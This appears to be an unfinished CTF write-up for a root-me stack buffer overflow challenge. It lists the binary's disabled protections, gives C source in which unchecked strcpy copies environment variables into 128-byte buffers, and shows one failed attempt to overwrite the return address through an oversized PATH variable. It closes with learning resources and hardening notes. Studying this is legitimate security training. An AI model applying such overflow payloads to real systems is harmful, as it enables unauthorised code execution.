ELF x86: Stack buffer overflow basic 4¶
root-me challenge: Can you return the env to me pleazzz?
Environment configuration:
PIE Position Independent Executable No
RelRO Read Only relocations No
NX Non-Executable Stack No
ASLR Address Space Layout Randomisation No
SF Source Fortification No
SSP Stack-Smashing Protection No
SRC Source code access Yes
Source code:
#include <stdio.h>
#include <stdlib.h>
#include <dirent.h>
#include <string.h>
struct EnvInfo
{
char home[128];
char username[128];
char shell[128];
char path[128];
};
struct EnvInfo GetEnv(void)
{
struct EnvInfo env;
char *ptr;
if((ptr = getenv("HOME")) == NULL)
{
printf("[-] Can't find HOME.\n");
exit(0);
}
strcpy(env.home, ptr);
if((ptr = getenv("USERNAME")) == NULL)
{
printf("[-] Can't find USERNAME.\n");
exit(0);
}
strcpy(env.username, ptr);
if((ptr = getenv("SHELL")) == NULL)
{
printf("[-] Can't find SHELL.\n");
exit(0);
}
strcpy(env.shell, ptr);
if((ptr = getenv("PATH")) == NULL)
{
printf("[-] Can't find PATH.\n");
exit(0);
}
strcpy(env.path, ptr);
return env;
}
int main(void)
{
struct EnvInfo env;
printf("[+] Getting env...\n");
env = GetEnv();
printf("HOME = %s\n", env.home);
printf("USERNAME = %s\n", env.username);
printf("SHELL = %s\n", env.shell);
printf("PATH = %s\n", env.path);
return 0;
}
app-systeme-ch8@challenge02:~$ export PATH=$PATH:`python -c "print 'A'*160 + '\x31\xf9\xff\xbf' + '\x2b\xfb\xff\xbf'"`
app-systeme-ch8@challenge02:~$ ./ch8
[+] Getting env...
[-] Can't find USERNAME.
Need to think some more …
Resources¶
Buffer Overflow ou explication de “une faille de type bufferoverflow”
Runtime Attacks : Buffer OverFlow and Return Oriented Programming
Counter moves¶
This variant works through input constraints on the overflow. Compiler hardening such as FORTIFY narrows the room. The defender’s view is in the blue notes on memory corruption and its limits.